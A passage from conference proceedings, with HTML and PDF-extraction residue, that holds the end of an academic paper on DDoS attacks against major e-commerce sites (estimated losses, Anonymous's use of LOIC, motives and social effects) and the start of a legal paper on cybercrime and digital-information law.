A new entrant to the ecosystem of electronic commerce is Facebook. Because of its widespread use by<br />
general public it was identified as a security threat by <strong>in</strong>dependent sources, documented by practices<br />
such as frequent privacy policies changes, collect<strong>in</strong>g, shar<strong>in</strong>g and manipulation with personal <strong>in</strong>formation<br />
as well as the attackers’ ability to distribute malicious code more quickly via the system (Fan & Yeung<br />
2010).<br />
Amazon.com is a mult<strong>in</strong>ational electronic commerce company, the biggest onl<strong>in</strong>e retailer <strong>in</strong> the US and<br />
also considered a major economic hub. It was chosen as an Anonymous cyber <strong>in</strong>itiative target due to it<br />
host<strong>in</strong>g a WikiLeaks mirror before decid<strong>in</strong>g to drop the support.<br />
The third corporation is eBay with its PayPal subsidiary.<br />
Not only f<strong>in</strong>ancial entities are considered significant for onl<strong>in</strong>e commerce, however. Google generates<br />
revenue from targeted advertis<strong>in</strong>g and affiliate market<strong>in</strong>g as well as preferential treatment of clients when<br />
search algorithms detect keywords <strong>in</strong> a search str<strong>in</strong>g.<br />
Two categories are not <strong>in</strong>cluded: f<strong>in</strong>ancial markets’ frontends and national symbols. While the former<br />
(represented by New York, London, and Tokyo Stock Exchanges or NASDAQ Stock Market) focus<br />
primarily on handl<strong>in</strong>g large sums of capital, the Internet functions solely as a medium of <strong>in</strong>formation<br />
exchange (external network), not the facilitator of buys and sells (<strong>in</strong>ternal isolated network). The<br />
232
Libor Sarga and Roman Jašek<br />
<strong>in</strong>terlopers would need to physically penetrate data centers or otherwise ga<strong>in</strong> access to the <strong>in</strong>ner network<br />
prior to launch<strong>in</strong>g the attack. Given the security precautions <strong>in</strong> these facilities the scenario’s probability<br />
and plausibility is only marg<strong>in</strong>al. Electronic assaults of national symbols (government portals, cultural<br />
heritage, major religious groups) wouldn’t as much generate substantial economic losses as may h<strong>in</strong>der<br />
the trust of citizens <strong>in</strong> nation’s capabilities to protect the national cyberspace. Such attacks shouldn’t<br />
therefore be deprioritized as to the effect they may have on the public’s op<strong>in</strong>ion.<br />
4.1.1 Estimated Losses<br />
The entities form<strong>in</strong>g a substantial part of virtual economy are summarized <strong>in</strong> a table below (Table 1). All<br />
the sites occupy the Alexa Top 500 and Fortune 500 positions which measures number of unique visitors<br />
and ranks US companies accord<strong>in</strong>g to gross revenues, respectively. Direct estimated losses are<br />
calculated from 2009 net <strong>in</strong>come (where correspond<strong>in</strong>g data were unavailable, revenue was used<br />
<strong>in</strong>stead). A year is converted to hours (365.25*24=8,766 hours) and the profit (revenue) divided by the<br />
constant, result<strong>in</strong>g <strong>in</strong> the arithmetic mean of net <strong>in</strong>come (revenue) per hour.<br />
Table 1: Significant commercial entities and estimated losses<br />
Name<br />
Net Income /<br />
Revenue* [mil. USD]<br />
1 hour<br />
Direct estimated losses<br />
for time offl<strong>in</strong>e [USD]<br />
8 hours 24 hours 48 hours<br />
DDoS<br />
target?<br />
Tool<br />
used<br />
Amazon.com 902 102,898 823,180 2,469,541 4,939,083 Yes LOIC<br />
eBay 2,389.1 272,542 2,180,333 6,540,999 13,081,999 No —<br />
Facebook* 700 (est.) 79,854 638,832 1,946,496 3,832,991 No —<br />
Google 6,520.45 743,834 5,950,673 17,852,019 35,704,038 No —<br />
MasterCard 1,462.53 166,841 1,334,730 4,004,189 8,008,378 Yes LOIC<br />
PayPal* 2,230 254,392 2,035,136 6,105,407 12,210,815 Yes LOIC<br />
Visa 2,966 338,353 2,706,822 8,120,465 16,240,931 Yes LOIC<br />
Yahoo 597.99 68,217 545,736 1,637,207 3,274,415 Yes ?<br />
Total 2,026,931 16,215,442 49,676,323 97,292,650<br />
The results don’t represent actual losses as the values are mathematically <strong>in</strong>ferred under the assumption<br />
every hour a year a constant number of transactions is carried out. They are also <strong>in</strong>ert to any <strong>in</strong>direct<br />
losses.<br />
Five of the eight hubs have been targeted by DDoS attacks so far. Four of them were chosen as a part of<br />
the Anonymous <strong>in</strong>itiative utiliz<strong>in</strong>g Low Orbit Ion Cannon (LOIC), a modified version of open source<br />
network stress test<strong>in</strong>g application which offers no IP address obfuscation mechanism, allow<strong>in</strong>g traceback<br />
(Pras et al 2010). Websites of Visa and MasterCard were <strong>in</strong>accessible for vary<strong>in</strong>g periods of time along<br />
with two of three PayPal subdoma<strong>in</strong>s. Amazon.com managed to handle <strong>in</strong>com<strong>in</strong>g traffic due to excess<br />
capacities employed before the Christmas shopp<strong>in</strong>g period. Yahoo was <strong>in</strong>accessible for the period of<br />
three hours.<br />
The results, despite be<strong>in</strong>g a crude measure, demonstrates what impact would a blackout of a mere hour<br />
had with more than two million estimated direct costs provided all the sites were taken offl<strong>in</strong>e<br />
simultaneously.<br />
4.1.2 Infrastructure capacities<br />
Virtual economy is vulnerable to DDoS attacks and the time for a broader <strong>in</strong>dustry and expert discussion<br />
regard<strong>in</strong>g the elevation of security policies not only on hardware/software level but primarily as a<br />
proactive measure is necessary. Servers form<strong>in</strong>g the basis of the economy may be overloaded <strong>in</strong> a<br />
matter of m<strong>in</strong>utes if spare resources are not employed.<br />
It is known Amazon.com offers robust cloud comput<strong>in</strong>g services as part of their highly scalable Amazon<br />
Elastic Compute Cloud (EC2) utilized by the company itself.<br />
Facebook is runn<strong>in</strong>g a platform consist<strong>in</strong>g of 800 servers capable of handl<strong>in</strong>g 200,000 UDP requests per<br />
second.<br />
233
Libor Sarga and Roman Jašek<br />
eBay servers spans 600 production <strong>in</strong>stances <strong>in</strong> more than 100 server clusters, handl<strong>in</strong>g a billion page<br />
views a day. Assum<strong>in</strong>g every page view is equal to a connection request, the arithmetic mean produces<br />
11,575 requests a second.<br />
No reliable data source exists to estimate PayPal’s server capacity, but s<strong>in</strong>ce it is a subsidiary of eBay,<br />
<strong>in</strong>frastructure resources are likely shared between the two sites.<br />
Google considers its server clusters parameters to be sensitive data and provide no specific <strong>in</strong>formation.<br />
Visa operates its own Virtual Private Network (VPN) and handles 2.5 million transactions per hour.<br />
Nevertheless, as the <strong>in</strong>frastructure wasn’t able to accommodate estimated 5,000–9,000 connections<br />
generated by the members of Anonymous, not every transaction requires an active connection.<br />
MasterCard servers handle more than 5.4 million transactions per day. The same as <strong>in</strong> case of Visa<br />
applies, though, as it wasn’t able to handle the group’s generated cont<strong>in</strong>uous stream of requests.<br />
4.2 Why and what?<br />
Assess<strong>in</strong>g the motives of the <strong>in</strong>terlopers requires acceptance of uncerta<strong>in</strong>ty s<strong>in</strong>ce proper scientific<br />
research is precluded. Attackers either go to great lengths to obfuscate their identities or declare their<br />
agendas only collectively <strong>in</strong> general statements.<br />
4.2.1 Motives<br />
As the DDoS attacks came <strong>in</strong>to broader media and public focus <strong>in</strong> relation to the Anonymous <strong>in</strong>itiative,<br />
the group itself may provide some <strong>in</strong>sight as to the purpose of their actions. The primary motive of the<br />
Operation: Payback, <strong>in</strong>stigated and so titled by this loose collective of <strong>in</strong>dividuals, was to retaliate aga<strong>in</strong>st<br />
companies which refused to raise further payments (PayPal, Visa, MasterCard), denied use of their<br />
<strong>in</strong>frastructure and services (Amazon.com’s EC2 and cessation of sell<strong>in</strong>g of an electronic book conta<strong>in</strong><strong>in</strong>g<br />
the first 5,000 cables) to WikiLeaks as it released confidential US military and diplomatic cables. In the<br />
December 10, 2010’s press release the group assures it didn’t seek to assail any critical <strong>in</strong>frastructure but<br />
only to raise awareness, call<strong>in</strong>g its activities a legitimate expression of dissent. It also states the attempt<br />
on Amazon.com servers never occurred which contradicts the outage of company’s several European<br />
subdoma<strong>in</strong>s on December 26, 2010 as well as media coverage of attempts to disrupt the service on<br />
December 9, 2010.<br />
Other <strong>in</strong>terests aren’t readily available and may be only hypothesized about. On national level,<br />
stimulation of social repercussions and general op<strong>in</strong>ion dis<strong>in</strong>tegration, especially when treated by the<br />
media, may be considered. However, <strong>in</strong>ability to protect national <strong>in</strong>terests <strong>in</strong> cyberspace may lead to<br />
<strong>in</strong>creased pressure to adm<strong>in</strong>ister measures mitigat<strong>in</strong>g the consequences, lead<strong>in</strong>g to overall net positive<br />
effects. United States Cyber Command (USCYBERCOM), Naval Network Warfare Command<br />
(NETWARCOM), Japanese Cyber Clean Center, European <strong>Security</strong> Technology Assessment Unit, and<br />
Ch<strong>in</strong>ese People’s Liberation Army (PLA)’s electronic warfare department (“Information <strong>Security</strong> Base”)<br />
were created to defend cyberspace territories of the respective states and to prevent future breaches.<br />
On economic level loss of consumer loyalty, caus<strong>in</strong>g <strong>in</strong>direct f<strong>in</strong>ancial losses and a shift <strong>in</strong> customers’<br />
preferences, <strong>in</strong>vestors’ withdrawal, cash flows decrease, additional costs of security and <strong>in</strong>formation<br />
technology audits, <strong>in</strong>frastructure resources expansion and public relations costs <strong>in</strong> a strategic perspective<br />
aren’t farfetched. Short-term effects are affected by the season dur<strong>in</strong>g which the attack is commenced<br />
with the most substantial losses generated before the end of the year. As documented by Amazon.com,<br />
additional resources lower<strong>in</strong>g the risk of DDoS are <strong>in</strong>tegrated dur<strong>in</strong>g these periods.<br />
4.2.2 Social repercussions<br />
The Internet as a rapidly evolv<strong>in</strong>g medium is distrusted when used as a facilitator of f<strong>in</strong>ancial<br />
transactions, especially <strong>in</strong> contrast to conservative paradigms many “traditional” <strong>in</strong>stitutions are based on.<br />
The situation is worsened by a gap between professionals’ and end-users’ knowledge of technology<br />
trends, protocols and threats. This deficit is exploited by the media when <strong>in</strong>form<strong>in</strong>g about computer<br />
security-related <strong>in</strong>cidents.<br />
234
Libor Sarga and Roman Jašek<br />
In a strategic perspective, DDoS may lead to a detriment <strong>in</strong> subjective notion of personal <strong>in</strong>formation’s<br />
safety. With the ma<strong>in</strong> source of news for general public be<strong>in</strong>g the media and the complex phenomena of<br />
network and data security requir<strong>in</strong>g long-term study, mis<strong>in</strong>formation is the logical result.<br />
As commercial economic hubs are the primary targets, <strong>in</strong>crease <strong>in</strong> the number of <strong>in</strong>cursions may either<br />
lead to buyers choos<strong>in</strong>g local, smaller-scale companies or limit<strong>in</strong>g the number of purchases on the<br />
Internet altogether, preferr<strong>in</strong>g offl<strong>in</strong>e shopp<strong>in</strong>g. Proper, unbiased and technically accessible onl<strong>in</strong>e<br />
tra<strong>in</strong><strong>in</strong>g course or a manual describ<strong>in</strong>g the underly<strong>in</strong>g term<strong>in</strong>ology <strong>in</strong> simple terms and assur<strong>in</strong>g the<br />
f<strong>in</strong>ancial and personal data are safe dur<strong>in</strong>g a DDoS attack, is required.<br />
The second major concern is the public’s reaction <strong>in</strong> case electronic bank<strong>in</strong>g servers would stop<br />
function<strong>in</strong>g which might have serious consequences as remote account management is a crucial part of<br />
services offered by banks. Not only would the situation require immediate attention of law enforcement<br />
agencies but also act<strong>in</strong>g on behalf of the legislative branch as laws govern<strong>in</strong>g loss of profits, unforeseen<br />
costs, and enforceable contracts’ fulfillments <strong>in</strong> this area rema<strong>in</strong> vague. Would the costs have to be<br />
redressed by the <strong>in</strong>stitutions which failed to protect <strong>in</strong>terests of its clients through <strong>in</strong>sufficient architecture<br />
stress test<strong>in</strong>g aga<strong>in</strong>st such attempts, or the attackers? And if the perpetrators are apprehended, will they<br />
be prosecuted under the law of countries of residence, the law of the affected country, or <strong>in</strong>ternational<br />
law? Until answers to these questions are provided and clearly communicated to the Internet users, it<br />
rema<strong>in</strong>s a “no man’s land”, an unregulated grey zone.<br />
The last concern is tied to <strong>in</strong>crease <strong>in</strong> racial sentiments. As the attackers’ identities rema<strong>in</strong> unknown,<br />
various theories regard<strong>in</strong>g their nationalities are offered. The largest botnet operator is claimed to be<br />
operat<strong>in</strong>g from Russian Federation while redirection of 15 % of Internet traffic through Ch<strong>in</strong>a <strong>in</strong> 2010<br />
allegedly caused by faulty addresses <strong>in</strong> DNS servers’ databases spawned claims of purposeful<br />
misconfiguration <strong>in</strong> order to obta<strong>in</strong> large amount of traffic data for analyses. Dissem<strong>in</strong>ation of such<br />
<strong>in</strong>formation without scientific, hard data-based research and conclusive evidence may lead to distrust of<br />
ethnic diversity and <strong>in</strong>clusion, cultural convergence as well as social <strong>in</strong>teractions the Internet is<br />
applauded for.<br />
5. In conclusion<br />
The challenge of conta<strong>in</strong><strong>in</strong>g DDoS attacks lies <strong>in</strong> the hostage situation they <strong>in</strong>itiate. Global filter<strong>in</strong>g<br />
mechanisms rema<strong>in</strong> <strong>in</strong>effective due to presence of legitimate requests. Several solutions were presented<br />
which may help to mitigate the consequences but no countermeasure able to automatically filter genu<strong>in</strong>e<br />
traffic from the attack flood is currently known.<br />
Topics for further research <strong>in</strong>clude analysis of <strong>in</strong>stitutionalized defense mechanisms and their<br />
cooperation <strong>in</strong> light of spontaneous cyber <strong>in</strong>itiatives (Anonymous) form<strong>in</strong>g and carry<strong>in</strong>g out their agenda<br />
us<strong>in</strong>g widely available tools. So far only isolated, national-level <strong>in</strong>itiatives exist but dynamically evolv<strong>in</strong>g<br />
threat vectors require collective actions and proactive efforts for their conta<strong>in</strong>ment. Research will <strong>in</strong>clude<br />
priorities, programs and manifestos of <strong>in</strong>dividual organizations and optimum model outl<strong>in</strong>e for a collective<br />
entity br<strong>in</strong>g<strong>in</strong>g together various <strong>in</strong>tellectual aspects with<strong>in</strong> the conf<strong>in</strong>es of consented-upon framework.<br />
Another topic of <strong>in</strong>terest is a shift <strong>in</strong> laws govern<strong>in</strong>g cyber crimes <strong>in</strong> wake of recent developments<br />
beg<strong>in</strong>n<strong>in</strong>g with the attacks of September 11, 2001. The Patriot Act, Critical Infrastructure Protection<br />
regulations <strong>in</strong> Europe, US and Asia along with their comparisons may bear <strong>in</strong>terest<strong>in</strong>g results. Common<br />
and contradict<strong>in</strong>g elements among jurisdictions form basis for analyses which may even provide h<strong>in</strong>ts as<br />
to the attackers’ locations assum<strong>in</strong>g they prioritize countries with lower crim<strong>in</strong>al penalties.<br />
Properties of known botnets, their capabilities and quantitative research of global spam levels <strong>in</strong> relation<br />
to deployed countermeasures creates a foundation for estimat<strong>in</strong>g profit the operators generate from<br />
controll<strong>in</strong>g these arrays of nodes.<br />
A model of motivat<strong>in</strong>g factors beh<strong>in</strong>d DDoS <strong>in</strong>corporat<strong>in</strong>g multidiscipl<strong>in</strong>ary f<strong>in</strong>d<strong>in</strong>gs (computer science,<br />
game theory) is also a viable opportunity for study together with <strong>in</strong>-depth media coverage research of<br />
computer security-related events, a source of both journalistic and theoretical exploration.<br />
Acknowledgements<br />
This work was supported by the “Competency Based e-Portal of <strong>Security</strong> and Safety Eng<strong>in</strong>eer<strong>in</strong>g” project<br />
under contract number 502092-LLP-1-2009-SK-ERASMUS-EMHE.<br />
235
References<br />
Libor Sarga and Roman Jašek<br />
Artail, H. et al. (2006) “A hybrid honeypot framework for improv<strong>in</strong>g <strong>in</strong>trusion detection systems <strong>in</strong> protect<strong>in</strong>g<br />
organizational networks”, Computers & <strong>Security</strong>, Vol 25, No. 4, June, pp 274-288.<br />
Bakshi, A. and Yogesh, B. (2010) “Secur<strong>in</strong>g Cloud from DDOS Attacks Us<strong>in</strong>g Intrusion Detection System <strong>in</strong> Virtual<br />
Mach<strong>in</strong>e”, 2nd International Conference on Communication Software and Networks (ICCSN), S<strong>in</strong>gapore,<br />
S<strong>in</strong>gapore.<br />
Bennahum, D. (1996) “Panix Attack”, [onl<strong>in</strong>e], Meme 2.12,.<br />
Bernste<strong>in</strong>, D. and Schenk, E. (2006) “SYN cookies”, [onl<strong>in</strong>e], cr.yp.to, http://cr.yp.to/syncookies/archive.<br />
Bernste<strong>in</strong>, D. (2010) “High-speed high-security cryptography: encrypt<strong>in</strong>g and authenticat<strong>in</strong>g the whole Internet”, 27th<br />
Chaos Communication Congress, Berl<strong>in</strong>, Germany, December.<br />
Carl, G., Kesidis, G., Brooks, R.R. and Rai, S. (2006) “Denial-of-service attack-detection techniques”, IEEE Internet<br />
Comput<strong>in</strong>g, Vol 10, No. 1, January/February, pp 82-89.<br />
CERT. (1996) “TCP SYN Flood<strong>in</strong>g and IP Spoof<strong>in</strong>g Attacks”, [onl<strong>in</strong>e], http://www.cert.org/advisories/CA-1996-<br />
21.html.<br />
CERT. (1997) “Denial of Service”, [onl<strong>in</strong>e], http://www.cert.org/tech_tips/denial_of_service.html.<br />
CERT. (1998) “Smurf IP Denial-of-Service Attacks”, [onl<strong>in</strong>e], http://www.cert.org/advisories/CA-1998-01.html.<br />
Eddy, W. (2007) “TCP SYN Flood<strong>in</strong>g Attacks and Common Mitigations”, [onl<strong>in</strong>e], IETF Request for Comments (RFC)<br />
4987, http://tools.ietf.org/html/rfc4987.<br />
Elliott, J. (2000) “Distributed denial of service attacks and the zombie ant effect”, Computer, Vol 2, No. 4, March/April,<br />
pp. 55-57.<br />
Fan, W. and Yeung, K.H. (2010) “Virus Propagation Model<strong>in</strong>g <strong>in</strong> Facebook”, International Conference on Advances<br />
<strong>in</strong> Social Networks Analysis and M<strong>in</strong><strong>in</strong>g (ASONAM), Odense, Denmark.<br />
Field<strong>in</strong>g, R. et al. (1999) “Hypertext Transfer Protocol -- HTTP/1.1”, [onl<strong>in</strong>e], IETF Request for Comments (RFC)<br />
2616, http://tools.ietf.org/html/rfc2616.<br />
Garber, L. (2000) “Denial-of-Service Attacks Rip the Internet”, Computer, Vol 33, No. 4, April, pp 12-17.<br />
Holz, T. (2005) “A Short visit to the Bot Zoo”, IEEE <strong>Security</strong> & Privacy, Vol 3, No. 3, May/June, pp 76-79.<br />
Householder, A., Houle, K. and Dougherty, C. (2002) “”Computer attack trends challenge Internet security”,<br />
Computer, Vol 35, No. 4, pp 5-7.<br />
IANA (2010). “Port Numbers”, [onl<strong>in</strong>e], http://www.iana.org/assignments/port-numbers.<br />
IBM. (2000) “Denial-of-Service attacks: Understand<strong>in</strong>g network vulnerabilities”, [onl<strong>in</strong>e], http://www-<br />
935.ibm.com/services/us/bcrs/pdf/wp_denial-of-service.pdf.<br />
Khattab, S.M. et al. (2003) “Proactive server roam<strong>in</strong>g for mitigat<strong>in</strong>g denial-of-service attack”, International Conference<br />
on Information Technology: Research and Education (ITRE), Newark, New Jersey.<br />
Kumar, S. (2007) “Smurf-based Distributed Denial of Service (DDoS) Attack Amplification <strong>in</strong> Internet”, Second<br />
International Conference on Internet Monitor<strong>in</strong>g and Protection (ICIMP), San Jose, California.<br />
MacVittie, L. (2008) “Layer 4 vs Layer 7 DoS Attack”, [onl<strong>in</strong>e], F5 DevCentral,<br />
http://devcentral.f5.com/weblogs/macvittie/archive/2008/07/08/3429.aspx.<br />
Mirkovic, J., Dietrich, S., Dittrich, D. and Reiher P. (2004) Internet Denial of Service: Attack and Defense<br />
Mechanisms, Prentice Hall, New Jersey.<br />
Nagesh, H.R. and Sekaran, K.C. (2006) “Design and Development of Proactive Solutions for Mitigat<strong>in</strong>g Denial-of-<br />
Service Attacks”, International Conference on Advanced Comput<strong>in</strong>g and Communications, Surathkal, India,<br />
December.<br />
Postel, J. (1981) “Transmission Control Protocol”, [onl<strong>in</strong>e], IETF Request for Comments (RFC) 793,<br />
http://tools.ietf.org/html/rfc793.<br />
Pras, A. et al. (2010) “Attacks by “Anonymous” WikiLeaks Proponents not Anonymous”, [onl<strong>in</strong>e], Centre for<br />
Telematics and Information Technology University of Twente, Enschede,<br />
http://epr<strong>in</strong>ts.eemcs.utwente.nl/19151/01/2010-12-CTIT-TR.pdf.<br />
Raymond, Eric S. (2004) The Jargon File, [onl<strong>in</strong>e], version 4.4.8., http://www.catb.org/jargon/.<br />
Raynal, F., Berthier, Y., Biondi, P. and Kam<strong>in</strong>sky, D. (2004) “Honeypot Forensics Part I: Analyz<strong>in</strong>g the Network”,<br />
IEEE <strong>Security</strong> & Privacy, Vol 2, No. 4, July/August, pp 72-78.<br />
Schuchard, Max et al. (2011) “Los<strong>in</strong>g Control of the Internet: Us<strong>in</strong>g the Data Plane to Attack the Control Plane”, 18th<br />
Annual Network & Distributed System <strong>Security</strong> Symposium (NDSS) 2011, San Diego, California.<br />
Trostle, J., Van Besien, B. and Pujari, A. (2010) “Protect<strong>in</strong>g aga<strong>in</strong>st DNS cache poison<strong>in</strong>g attacks”, 6th IEEE<br />
Workshop on Secure Network Protocols (NPSec), Kyoto, Japan, October.<br />
Vaquero, L.M., Rodero-Mer<strong>in</strong>o, L., Caceres, J. and L<strong>in</strong>der, M. (2009) “A break <strong>in</strong> the clouds: towards a cloud<br />
def<strong>in</strong>ition”, ACM SIGCOMM Computer Communication Review, Vol 39, No. 1, January, pp. 50-55.<br />
Zargar, G.R. and Kabiri, P. (2009) “Identification of effective network features to detect Smurf attack”, 7th IEEE<br />
Student Conference on Research and Development (SCOReD), UPM Serdang, Malaysia.<br />
236
Legal Protection of Digital Information <strong>in</strong> the era of Information<br />
Warfare<br />
Małgorzata Skórzewska-Amberg<br />
Kozm<strong>in</strong>ski University, Warsaw, Poland<br />
mskorzewska@kozm<strong>in</strong>ski.edu.pl<br />
Abstract: The danger of uncontrolled use of computers and computer networks has begun to be noticed <strong>in</strong> the last<br />
few years. Crim<strong>in</strong>al acts committed <strong>in</strong> networks with the use of networks and aga<strong>in</strong>st networks, reach beyond national<br />
borders. S<strong>in</strong>ce the 1990s, when the United Nations (UN) recognized computer violation as a form of transborder<br />
crime, profits orig<strong>in</strong>at<strong>in</strong>g <strong>in</strong> computer crime have surpassed those from drug trade. Organized crime is adapt<strong>in</strong>g<br />
to the environment of advanced technology, us<strong>in</strong>g thousands of computer networks to commit crimes on a global<br />
scale. Openness and anonymity is the strength of the Internet, but rema<strong>in</strong>s at the same time its greatest weakness.<br />
Among the network users, the group which aims at undesired or even unlawful access<strong>in</strong>g, distribut<strong>in</strong>g and exchang<strong>in</strong>g<br />
<strong>in</strong>formation is grow<strong>in</strong>g. Technical solutions <strong>in</strong> <strong>in</strong>formation security have to be supported by demands to follow the<br />
rules of relevant procedures – assured through legal state obligations and sanctions <strong>in</strong> case of violation of such rules.<br />
To translate the language used by modern technology <strong>in</strong>to proper legal language and catch<strong>in</strong>g behaviour seem<strong>in</strong>gly<br />
unimportant or of m<strong>in</strong>or consequence, but caus<strong>in</strong>g major damage, turned out to be most difficult. It is hence of great<br />
significance to adopt laws cover<strong>in</strong>g as much as possible of cyberspace behaviour. One of the most effective methods<br />
of secur<strong>in</strong>g digital <strong>in</strong>formation is conceal<strong>in</strong>g it with the use of cryptography. It is true that communication us<strong>in</strong>g concealed<br />
<strong>in</strong>formation protects privacy and secrecy of mails to a high degree, but renders at the same time considerably<br />
more difficult access<strong>in</strong>g to <strong>in</strong>formation <strong>in</strong> cases when common good demands break<strong>in</strong>g such secrecy. Such procedures<br />
are most often carefully described and rigorously regulated by law s<strong>in</strong>ce they <strong>in</strong>terfere with the sensitive question<br />
of privacy of citizens. There is nevertheless still a need to specify i.a. how to use available cryptographic tools <strong>in</strong><br />
order to access content of cryptographically concealed transmission without hav<strong>in</strong>g access to the cryptographic keys.<br />
All efforts to exercise control over the Internet create controversy, rais<strong>in</strong>g questions about freedom of speech, stirr<strong>in</strong>g<br />
up protests about censorship, call<strong>in</strong>g <strong>in</strong> question the <strong>in</strong>trusion of state authorities upon the private sphere of network<br />
users. At the same time, more countries <strong>in</strong>troduce legal <strong>in</strong>struments of decree and prohibition <strong>in</strong> order to prevent law<br />
violation, someth<strong>in</strong>g the Internet facilitates or even makes possible. In times of terrorism threats, efforts are <strong>in</strong>tensified<br />
aim<strong>in</strong>g at <strong>in</strong>troduc<strong>in</strong>g measures which allow certa<strong>in</strong> degree of control over the virtual space. It certa<strong>in</strong>ly requires<br />
a balance between the necessity of security regard<strong>in</strong>g citizens and the need to guarantee their rights.<br />
Keywords: computer network, legal <strong>in</strong>terception, unauthorized access, cybercrime, anonymity, cryptography<br />
1. Introduction<br />
The aim of this paper is primarily to identify and describe some of the most burn<strong>in</strong>g issues at the crossroad<br />
of law and <strong>in</strong>formation technology. In order to discuss relevant legislative solutions, it is first necessary<br />
to provide a more general survey of the background to these challenges.<br />
Greatest among the challenges at stake is the urgent necessity of greater <strong>in</strong>ternational cooperation <strong>in</strong><br />
combat<strong>in</strong>g a wide range of crimes committed <strong>in</strong> ICT networks, as well as further legislative harmonization<br />
on a global scale.<br />
F<strong>in</strong>ally, an effort is made <strong>in</strong> the conclusions to identify some of the more important legal priorities <strong>in</strong> combat<strong>in</strong>g<br />
global cybercrime.<br />
2. Information as the foundation of modern society<br />
While the last decades of the previous century saw a tremendous development <strong>in</strong> computers and computer<br />
networks, the new century sees an explosive expansion and global use of <strong>in</strong>formation and communication<br />
technology. The <strong>in</strong>formation society is a fact and def<strong>in</strong>es the highly developed society <strong>in</strong> which<br />
full access to services and <strong>in</strong>formations is guaranteed through ever evolv<strong>in</strong>g ICT technology (cf. Bangeman's<br />
Report; Directive 98/34/EC of the European Parliament and of the Council of 22 June 1998 lay<strong>in</strong>g<br />
down a procedure for the provision of <strong>in</strong>formation <strong>in</strong> the field of technical standards and regulations, OJ L<br />
204, 21.7.1998, p.37–48).<br />
Updated <strong>in</strong>formation, accessible at any time, is often the key to success – scientific, economic and political.<br />
The consequences of disruption of <strong>in</strong>tegrity of <strong>in</strong>formation can often be serious. Conceal<strong>in</strong>g and<br />
modification of <strong>in</strong>formation is as dangerous as its destruction.<br />
At the foundation of well function<strong>in</strong>g <strong>in</strong>formation societies lies security, def<strong>in</strong>ed not only by technical <strong>in</strong>struments<br />
as cryptography, but also by legislation. With the widespread distribution of computer systems<br />
237
Małgorzata Skórzewska-Amberg<br />
and the ease with which various systems are communicat<strong>in</strong>g with each other, exchange of data is not<br />
restricted <strong>in</strong> space and can be subject of different legal systems.<br />
Convergence of law is therefore a necessary precondition <strong>in</strong> order to guarantee legal protection of persons<br />
<strong>in</strong> different countries.<br />
3. Information as subject and object of law order disruption<br />
Methods used <strong>in</strong> computer crime have been and will be chang<strong>in</strong>g along with cont<strong>in</strong>uous technological<br />
development. Ways of unauthorized <strong>in</strong>terference with computer systems are grow<strong>in</strong>gly sophisticated and<br />
complex.<br />
It is of course possible to identify different types of abuse <strong>in</strong> computer systems, computer network and <strong>in</strong><br />
the entire cyberspace, but such dist<strong>in</strong>ctions are <strong>in</strong>creas<strong>in</strong>gly less essential <strong>in</strong> a situation where practically<br />
every computer user can get access to the network sooner or later.<br />
It is also <strong>in</strong>creas<strong>in</strong>gly difficult to def<strong>in</strong>e <strong>in</strong>dividual forms of <strong>in</strong>formation technology violation. These are<br />
often <strong>in</strong>terconnected, as a consequence or the cause of another violation. As an example, viruses are<br />
often used with the purpose to ga<strong>in</strong> control over <strong>in</strong>formation <strong>in</strong> a network or to disguise an <strong>in</strong>trusion. Furthermore<br />
- frauds, <strong>in</strong>clud<strong>in</strong>g computer frauds, are often connected to break<strong>in</strong>g of security measures or<br />
unauthorized disruption of <strong>in</strong>formation <strong>in</strong>tegrity. F<strong>in</strong>ally, pornography - especially child pornography – can<br />
also be used as a particularly effective <strong>in</strong>strument of pressure (<strong>in</strong>clud<strong>in</strong>g blackmail), for <strong>in</strong>stance <strong>in</strong> connection<br />
to network <strong>in</strong>trusion.<br />
3.1 Information as <strong>in</strong>strument of law order disruption<br />
The prime <strong>in</strong>tention of widespread access of <strong>in</strong>formation, the ease with which it can be made public and<br />
searched is to enable exchange of views, facilitate trade and stimulate research.<br />
At the same time, such <strong>in</strong>formation can be used to create negative perception of for example a competitor<br />
or to exercise pressure. This can happen when op<strong>in</strong>ions about concrete persons, companies or products<br />
are expressed on public Internet forums.<br />
Consequently, the amount of network users focus<strong>in</strong>g on access, distribution and exchange of <strong>in</strong>formation<br />
undesired by law or illegal, is <strong>in</strong>creas<strong>in</strong>g.<br />
Global computer networks are to be considered as a public place of speech. This is the reason why regulations<br />
concern<strong>in</strong>g violation of public order, crim<strong>in</strong>al acts aga<strong>in</strong>st freedom of conscience and religion,<br />
crim<strong>in</strong>al acts aga<strong>in</strong>st bodily <strong>in</strong>tegrity and <strong>in</strong>violability can apply to content appear<strong>in</strong>g <strong>in</strong> public network<br />
forums.<br />
Crim<strong>in</strong>al law <strong>in</strong> most countries prohibits i.a.: public promotion of fascism or any other form of totalitarian<br />
systems or public dissem<strong>in</strong>ation of nationalistic, ethnic, racist or religious dissention, as well as defamation<br />
based on national identity, ethnicity, racism, religious affiliation or lack of denom<strong>in</strong>ation (i.a.: art. 256 i<br />
257 of Polish Penal Code (kodeks karny - kk); 86, 86a, art. 130 - 131 of the German Penal Code (Strafgesetzbuch<br />
- StGB); art. 225-1, R624-3, R624-4 i R625-7 of the French Penal Code (Code pénal - C.P.)<br />
and art. 1 of Loi 90-615 du 13 Juillet 1990 tendant à réprimer tout acte raciste, antisémite ou xénophobe,<br />
Journal Officiel Numéro 162 du 14 Juillet 1990) and penalizes violation of religious feel<strong>in</strong>gs of other persons<br />
committed by offend<strong>in</strong>g religious cult objects (e.g. art. 196 kk, art. 166 StGB).<br />
Penalized is defamation of natural and legal persons, organisations not hav<strong>in</strong>g the status of legal person<br />
with regard to such acts or features, which could br<strong>in</strong>g discredit <strong>in</strong> the face of public op<strong>in</strong>ion or result <strong>in</strong><br />
loss of confidence, necessary for a given position, occupation or k<strong>in</strong>d of activity (<strong>in</strong>sult and defamation –<br />
art 212, 216 § 2 kk; art. 185-188 StGB).<br />
A different k<strong>in</strong>d of illicit acts, which can be committed through computer network, is the use of illegal violence<br />
or threats <strong>in</strong>tend<strong>in</strong>g to make another person to act <strong>in</strong> a certa<strong>in</strong> way, fail to act or threats to commit<br />
illegal acts aga<strong>in</strong>st another person or somebody close, if such a threat is perceived as justified fear (art.<br />
115 §12 and 20, 119, 190 and 191 kk; art. 240 and 241 StGB; British Public Order Act 1986, Protection of<br />
Harassment Act 1997, Telecommunications Act 1984 and Malicious Communication Act 1988).<br />
238
Małgorzata Skórzewska-Amberg<br />
An example of such act is the send<strong>in</strong>g of threaten<strong>in</strong>g letters by electronic mail or publish<strong>in</strong>g material of<br />
